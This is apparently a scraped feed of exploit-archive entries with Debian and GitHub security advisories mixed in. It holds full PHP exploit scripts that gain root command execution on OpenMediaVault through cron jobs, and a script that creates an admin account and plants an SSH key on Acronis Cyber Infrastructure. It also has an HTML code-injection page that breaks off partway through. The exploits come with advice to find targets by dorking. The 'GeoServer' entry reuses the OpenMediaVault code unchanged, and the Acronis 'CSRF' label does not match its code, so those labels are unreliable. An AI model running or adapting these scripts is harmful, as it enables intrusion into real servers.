OpenMediaVault version 7.4.2-2 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : OpenMediaVault 7.4.2-2 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.openmediavault.org/                                                                                             |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+]  uses the CURL library for sending HTTP requests and handles JSON parsing for interaction with the OpenMediaVault API.[+] Line 148 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

OpenMediaVault 7.4.2-2 Code Injection

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/geoserver/                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GeoServer 2.25.1 Code Injection

Debian Linux Security Advisory 5784-1 - Fabian Vogt reported that the PAM module in oath-toolkit, a collection of components to build one-time password authentication systems, does not safely perform file operations in users's home directories when using the usersfile feature (allowing to place the OTP state in the home directory of the to-be-authenticated user). A local user can take advantage of this flaw for root privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5784-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 04, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : oath-toolkitCVE ID         : CVE-2024-47191Fabian Vogt reported that the PAM module in oath-toolkit, a collectionof components to build one-time password authentication systems, doesnot safely perform file operations in users's home directories whenusing the usersfile feature (allowing to place the OTP state in the homedirectory of the to-be-authenticated user). A local user can takeadvantage of this flaw for root privilege escalation.For the stable distribution (bookworm), this problem has been fixed inversion 2.6.7-3.1+deb12u1.We recommend that you upgrade your oath-toolkit packages.For the detailed security status of oath-toolkit please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/oath-toolkitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmcAPvdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Th1A/9HWbGPaDbzOAbloBMyigtmxsGRlRI/yw/7zP1Ay37cgYd79nQyXrrjNAgrBqBVDJEm/X6xSApPLiJ3RuRPvExx4cW0n5HgSV86XwXckeid/JiBIC0CvH8C/482JgsYP8oxf1c6q5HU66uZApD93YjxcA59voxqmHDgzGm5DazakShQhKb7KOqvATx75CbDhUp5H1xskGTWiyZJuAljqstFm3DD/JCYWm7XEFkinF/l832S8CKrehchM+ZpcwGlxf4vZxyll+AHZMPomgmts7kf1AJi95mgzgxCsnT5tm1yl9M0kEZIArKm8BXw8gA6ZM7+Y+hbiDiHQGpWCxdBAvIwZ1nH6lAhU5aERgXoehUS6wzuZlVZ010er9ff/mPsyeQm35+TeRhIFlk7zk1b79ct0h+hOeaiqczXox9wFuZAZcuJuZnHXcV5TiJ8tGH9fXM25GmvTbWJ2YRHmo6k2+vR0XyksRcjQFLAhw21b265aSPkPDCVJZgs5pLpdmpM84N6Y0yZTrNR8mvCnSOiSMDcDf2nqn4jxPKkKpRp8JNtYlJSPOFGuKzSNKXzMdMnZ4EkXpDpCiP8unz7xWzCf19FhtHHJo2Zn2wKmOTWeLSQ3oCjGsdpn/MWb+t5P9A0fJ8v8vPXyKfyy/5owAlvkWmvyihNlxezEStNxdYx/sKn/U==iccV-----END PGP SIGNATURE-----

Debian Security Advisory 5784-1

Debian Linux Security Advisory 5783-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5783-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 04, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-9392 CVE-2024-9393 CVE-2024-9394 CVE-2024-9401

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

Debian follows the extended support releases (ESR) of Firefox.  
Starting with this update we're now following the 128.x releases.

Between 115.x and 128.x, Firefox has seen a number of feature  
updates. For more information please refer to  
https://www.mozilla.org/en-US/firefox/128.0esr/releasenotes/

For the stable distribution (bookworm), these problems have been fixed in  
version 128.3.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcANaYACgkQEMKTtsN8  
TjbVTxAAiGB8YD+VvINzF3/vvN1QMf5RT0QqmEtawGI+SWCWClfzT1zqPTvKDNId  
vAo5r/h1GsGNP+GwEqQu3GTn6GUsX6lzXidxtt3OCleWDzPIZCcFEJLRkvyzus0n  
cERDOEw77EQ63gQcduJvCt0ZClOVzaOgY+9m8IdkZK+n7WPKse/Ey6dI/A+//d5J  
gszktzRrIYNs+09X3yfmeJB1yn3oELNLGiL0KMmJ0Ck2+QToPKIz5wh0jMtirNuV  
pKMdM8sWkqPyKElTvoRvcDMpXW+cySaQyZlDWy2P9JdYJlm6HBHzLNE0TQbtrJmq  
IGK2XABgBn4QtDie+7OJk/QYm3sRpJotIWUrrYp5h3ZYK8p3nBpGKE/OBqNLlERQ  
TJCm8jT+pkHRhk1dJtbH3q30qjv5J0WY58a9GWGshh8JG+itPf/NHyMLE9aKoX+2  
/iDfjU8ENJcGXWBDxW2qu6KX4pkSKEkq5g/3M9Z6GG5Iucnw30On+DWxsTSGT6Ur  
8oIpRkrLL2nTx1FPUSz8cYH0GK7yDWRf4v+uEr93wDZhKkqIEiF+grRvom1s9bti  
ptgA7Thwm3r8dJvDQM01RCeNwRMRrkGBP1l/cWHZ0CBEJqEq3JS93pE7M9PDd/Jr  
MEm86whIZWHq6N3ql0fC1ATrALfvyVvQZFdjXFF5VUu1WbMRpDI=  
=0Mtj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5783-1

Debian Linux Security Advisory 5782-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5782-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 03, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-31083 CVE-2024-27017 CVE-2024-35937 CVE-2024-35943  
                 CVE-2024-35966 CVE-2024-40972 CVE-2024-41016 CVE-2024-41096  
                 CVE-2024-41098 CVE-2024-42228 CVE-2024-42314 CVE-2024-43835  
                 CVE-2024-43859 CVE-2024-43884 CVE-2024-43892 CVE-2024-44931  
                 CVE-2024-44938 CVE-2024-44939 CVE-2024-44940 CVE-2024-44946  
                 CVE-2024-44947 CVE-2024-44974 CVE-2024-44977 CVE-2024-44982  
                 CVE-2024-44983 CVE-2024-44985 CVE-2024-44986 CVE-2024-44987  
                 CVE-2024-44988 CVE-2024-44989 CVE-2024-44990 CVE-2024-44991  
                 CVE-2024-44995 CVE-2024-44998 CVE-2024-44999 CVE-2024-45000  
                 CVE-2024-45002 CVE-2024-45003 CVE-2024-45006 CVE-2024-45007  
                 CVE-2024-45008 CVE-2024-45009 CVE-2024-45010 CVE-2024-45011  
                 CVE-2024-45016 CVE-2024-45018 CVE-2024-45019 CVE-2024-45021  
                 CVE-2024-45022 CVE-2024-45025 CVE-2024-45026 CVE-2024-45028  
                 CVE-2024-45029 CVE-2024-46673 CVE-2024-46674 CVE-2024-46675  
                 CVE-2024-46676 CVE-2024-46677 CVE-2024-46679 CVE-2024-46685  
                 CVE-2024-46686 CVE-2024-46689 CVE-2024-46694 CVE-2024-46702  
                 CVE-2024-46707 CVE-2024-46711 CVE-2024-46713 CVE-2024-46714  
                 CVE-2024-46715 CVE-2024-46716 CVE-2024-46717 CVE-2024-46719  
                 CVE-2024-46720 CVE-2024-46721 CVE-2024-46722 CVE-2024-46723  
                 CVE-2024-46724 CVE-2024-46725 CVE-2024-46726 CVE-2024-46731  
                 CVE-2024-46732 CVE-2024-46734 CVE-2024-46735 CVE-2024-46737  
                 CVE-2024-46738 CVE-2024-46739 CVE-2024-46740 CVE-2024-46743  
                 CVE-2024-46744 CVE-2024-46745 CVE-2024-46746 CVE-2024-46747  
                 CVE-2024-46750 CVE-2024-46752 CVE-2024-46755 CVE-2024-46756  
                 CVE-2024-46757 CVE-2024-46758 CVE-2024-46759 CVE-2024-46761  
                 CVE-2024-46763 CVE-2024-46770 CVE-2024-46771 CVE-2024-46773  
                 CVE-2024-46777 CVE-2024-46780 CVE-2024-46781 CVE-2024-46782  
                 CVE-2024-46783 CVE-2024-46784 CVE-2024-46791 CVE-2024-46794  
                 CVE-2024-46795 CVE-2024-46798 CVE-2024-46800 CVE-2024-46802  
                 CVE-2024-46804 CVE-2024-46805 CVE-2024-46807 CVE-2024-46810  
                 CVE-2024-46812 CVE-2024-46814 CVE-2024-46815 CVE-2024-46817  
                 CVE-2024-46818 CVE-2024-46819 CVE-2024-46821 CVE-2024-46822  
                 CVE-2024-46826 CVE-2024-46828 CVE-2024-46829 CVE-2024-46830  
                 CVE-2024-46832 CVE-2024-46835 CVE-2024-46836 CVE-2024-46840  
                 CVE-2024-46844 CVE-2024-46846 CVE-2024-46848 CVE-2024-46849  
                 CVE-2024-46852 CVE-2024-46853 CVE-2024-46854 CVE-2024-46855  
                 CVE-2024-46857 CVE-2024-46858 CVE-2024-46859 CVE-2024-46865

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.112-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmb+5rNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qe8Q/+NKIdMggBJxg+LefsFD2RDncuEOQMKMIpBMFmm7VsrGln85jOptgfZNgY  
6ytef8apSEw4MvwJ4TwlRDtNmAkwTauWd9cDx49BlDupZpdBGidWUW7RbombbihU  
UXSpRMsm/lsXyPF2Llgmo18DeEOfyrGyQfXHWYxRjjNNPRZvxpgXZnntENijYy0y  
e7ngYxVR6VwT2SDndICNLgJTZ+WGOHOD6DcrXvpwcHbcpCgFYrP1Iqe3gjbTX0VV  
Vcv417x40HfBBPxLtAFYZNDo6/Zgfxugeo/LQVMmXXFjLCJFswxukQt9CWSSKNzV  
0EsmgAn0C1xyq76sgCo49wKyfRlsoC4sH5sjRdod2bisY7PJK/DqKMK3nKg+zN0w  
GMbgb6a8Th93QuOkBuAm5gEclsPB0m35ZxSKNKZD+CKMBVYLB1OexI9v1dkTzRM/  
TP76yVltGmbECnI1ip+JSKYAgHwLgMfxEu2XNwFeVgIcES2CreD8LMXq3MstKyLB  
pwN6VRJ4n9vpW/xUxJcdFOpgvsYLs7xOcoXk6TEInwx0NhQBNj7eC4J2dbtN+g0c  
m349ryE+rZlPscH2vP0fzwXNfZemLb/KlZhhxraBW7dKOuHSJ+UHV3Hul9QTXzmD  
HtZRwbU6DfqqzS/1JKxfLA1oVLI98JiDicOJyBwdtKjJu9M1CRY=  
=J2U0  
-----END PGP SIGNATURE-----

Debian Security Advisory 5782-1

### Impact

The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, `serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)` would result in `"userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"`, setting `userName` cookie to `<script>` and ignoring `value`.

A similar escape can be used for `path` and `domain`, which could be abused to alter other fields of the cookie.

### Patches

Upgrade to 0.7.0, which updates the validation for `name`, `path`, and `domain`.

### Workarounds

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

### References

* https://github.com/jshttp/cookie/pull/167

**Impact**

The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.

A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.

**Patches**

Upgrade to 0.7.0, which updates the validation for name, path, and domain.

**Workarounds**

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

**References**

*   jshttp/cookie#167

**References**

*   GHSA-pxg6-pf52-xh8x
*   jshttp/cookie#167
*   jshttp/cookie@e100428

GHSA-pxg6-pf52-xh8x: cookie accepts cookie name, path, and domain with out of bounds characters

Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.acronis.com/en-eu/products/cyber-infrastructure/                                                                |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] add new admin.[+] Line 83 + 100 +138 + 202 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass AcronisExploit {    private $sshSocket;    private $dbConn;    private $clusterId;        public function __construct() {        // Initialize default values        $this->sshSocket = null;        $this->dbConn = null;        $this->clusterId = null;    }    // Function to add an admin user to PostgreSQL DB    public function addAdminUser($username, $userid, $password) {        echo "Creating admin user $username with userid $userid\n";        // Insert new admin user into the user table        $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");        if (!$resQuery) return false;        // Insert new admin user into the local_user table        $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");        if (!$resQuery) return false;                $idLuser = pg_fetch_result($resQuery, 0, 0) + 1;        $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");        if (!$resQuery) return false;        // Hash the password        $passwordHash = password_hash($password, PASSWORD_BCRYPT);        echo "Setting password $password with hash $passwordHash\n";        $today = date('Y-m-d');        $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");        if (!$resQuery) return false;        // Assign admin roles        $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");        $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");        echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";        $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");        echo "Successfully created admin user $username with password $password\n";        return true;    }    // Function to run a PostgreSQL query    private function postgresQuery($query) {        $result = pg_query($this->dbConn, $query);        if (!$result) {            echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";            return false;        }        return $result;    }    // Function to login to SSH    public function doSshLogin($ip, $user, $sshKey) {        $connection = ssh2_connect($ip, 22);        if (!$connection) {            echo "SSH connection failed\n";            return false;        }        if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {            $this->sshSocket = $connection;            return true;        } else {            echo "SSH authentication failed\n";            return false;        }    }    // Function to login to Acronis Cyber Infrastructure web portal    public function aciLogin($name, $pwd) {        $postData = json_encode([            'username' => $name,            'password' => $pwd        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"code":200') !== false);    }    // Function to get the cluster ID    public function getClusterId() {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        $data = json_decode($response, true);        if (isset($data['data'][0]['id'])) {            return $data['data'][0]['id'];        }        return null;    }    // Function to generate SSH keys    private function generateSshKeys() {        $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');        $publicKey = $privateKey . '.pub';        ssh2_genkeypair($privateKey, $publicKey);        return [            'private' => $privateKey,            'public' => $publicKey        ];    }    // Function to upload SSH public key    public function uploadSshKey($sshKey, $clusterId) {        $postData = json_encode([            'key' => $sshKey,            'event' => [                'name' => 'SshKeys',                'method' => 'post',                'data' => [                    'key' => $sshKey                ]            ]        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"task_id"') !== false);    }    // Main exploit function    public function exploit($rhost, $dbPort, $sshPort, $username, $password) {        // Connect to PostgreSQL        $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");        if (!$this->dbConn) {            echo "Could not connect to PostgreSQL database\n";            return false;        }        // Add a new admin user        $newUsername = substr(md5(rand()), 0, 8);        $newPassword = substr(md5(rand()), 0, 16);        $userId = bin2hex(random_bytes(16));        $this->addAdminUser($newUsername, $userId, $newPassword);        // Login to Acronis        if (!$this->aciLogin($newUsername, $newPassword)) {            echo "Failed to login to Acronis\n";            return false;        }        // Get cluster ID        $this->clusterId = $this->getClusterId();        if (!$this->clusterId) {            echo "Failed to get cluster ID\n";            return false;        }        // Generate SSH keys        $sshKey = $this->generateSshKeys();        // Upload SSH public key        if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {            echo "Failed to upload SSH public key\n";            return false;        }        // SSH Login        if (!$this->doSshLogin($rhost, 'root', $sshKey)) {            echo "SSH login failed\n";            return false;        }        echo "Exploit successful, SSH session established!\n";        return true;    }}// Example usage$exploit = new AcronisExploit();$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Vehicle Service Management System 1.0 WYSIWYG code injection vulnerability                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |  
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php . 

   [+] Line 86 :  Set your Target.

[+] Line 27 :  set your payload.  <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Welcome Page Editor</title>  
    <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>  
</head>  
<body>  
    <main id="main" class="main">  
        <div class="pagetitle">  
          <h1>Welcome Page</h1>  
          <nav>  
              <ol class="breadcrumb">

                             <li class="breadcrumb-item active">Welcome Page</li>  
              </ol>  
          </nav>  
        </div>

        <div id="msg-container"></div>

                <div class="card rounded-0">  
          <div class="card-body rounded-0 pt-4">  
            <div class="container-fluid">  
              <form id="page-form">  
                <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
              </form>  
            </div>  
          </div>  
          <div class="card-footer">  
            <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
              <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
            </div>  
          </div>  
        </div>

        <div id="loader" style="display:none;">Loading...</div>  
        <div id="toast"></div>

        <script>  
            // Initialize TinyMCE  
            tinymce.init({  
                selector: 'textarea.tinymce-editor',  
                height: 300,  
                menubar: false,  
                plugins: [  
                  'advlist autolink lists link image charmap print preview anchor',  
                  'searchreplace visualblocks code fullscreen',  
                  'insertdatetime media table paste code help wordcount'  
                ],  
                toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
                         'alignleft aligncenter alignright alignjustify | ' +  
                         'bullist numlist outdent indent | removeformat | help'  
            });

            // Loader functions  
            function start_loader() {  
                document.getElementById('loader').style.display = 'block';  
            }

            function end_loader() {  
                document.getElementById('loader').style.display = 'none';  
            }

            // Toast function  
            function showMessage(message, type) {  
                const messageDiv = document.getElementById('toast');  
                messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
                setTimeout(() =>        {  
                    messageDiv.innerHTML = '';  
                }, 3000);  
            }

            // Form submit event listener  
            document.getElementById('page-form').addEventListener('submit', function(e) {  
                e.preventDefault(); // Prevent page reload

                // Start loader  
                start_loader();

                const formData = new FormData(this); // Get form data  
                const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

                // Set up request  
